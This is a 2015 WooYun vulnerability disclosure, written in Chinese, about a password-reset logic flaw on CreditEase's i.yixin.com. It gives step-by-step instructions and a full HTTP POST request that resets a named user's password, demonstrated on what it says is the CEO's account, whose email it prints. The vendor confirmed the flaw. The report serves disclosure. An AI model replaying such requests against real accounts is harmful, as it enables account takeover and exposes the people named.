当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106754

漏洞标题:宜信在线官网任意用户密码重置/CEO账号演示<新思路>

相关厂商:宜信

漏洞作者: BMa

提交时间:2015-04-09 12:06

修复时间:2015-05-24 16:22

公开时间:2015-05-24 16:22

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-19: 细节向核心白帽子及相关领域专家公开
2015-04-29: 细节向普通白帽子公开
2015-05-09: 细节向实习白帽子公开
2015-05-24: 细节向公众公开

简要描述:

宜信在线官网任意用户密码重置/CEO账号演示<新思路>
为什么是CEO账号呢?因为这个帐号是tangning@creditease.cn,莫非贵公司还有人与CEO抢公司邮箱账号?
20rank - - ! 惭愧

详细说明:

站点:http://i.yixin.com/
为什么说是新思路呢?在测试时发现每个账号与当前浏览器session绑定,也就是当前session只能重置一个账号密码,进一步发现该session在浏览器第一次打开时已经生成<而不是打开重置密码链接刷新的>,表现在客户端的就是cookie里的PHPSESSID
所以具体步骤如下:<步骤截图在第7步>
1、关闭浏览器
2、重新打开浏览器,访问http://i.yixin.com/,来到重置密码的地方,输入邮箱账号,点击下一步
3、这个过程中抓包,获取PHPSESSID,当然还有邮箱账号
4、将上面的PHPSESSID以及邮箱账号替换到下面的数据包中

POST /upwd.html HTTP/1.1
Host: i.yixin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://i.yixin.com/forget/d35279mMPiNNQemHNSbODYL7IS25UYCNRrnPs9FT05fu47Q7Fpg5eO2sl6-Kwy5g4Ilyc6_jEuwAfGvrFdnry4cNC2G9
Content-Length: 69
Cookie: PHPSESSID=sddmrf2fl52vio9ug477qcndn7;
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
reg_name=tangning%40creditease.cn&reg_pwd=1qaz2wsx&reg_repwd=1qaz2wsx


5、返回1,搞定

0.jpg


6、接下来自然是登录账号了,CEO

1.jpg


7、再来一个,也是贵公司的员工
<详细过程在图中>

1.1.jpg


1.2.jpg


1.3.jpg


漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-09 16:20

厂商回复:

感谢您对宜信安全的关注与支持。
之前使用SessionID的认证方式过于简单,感谢白帽子对漏洞的深入挖掘

最新状态:

暂无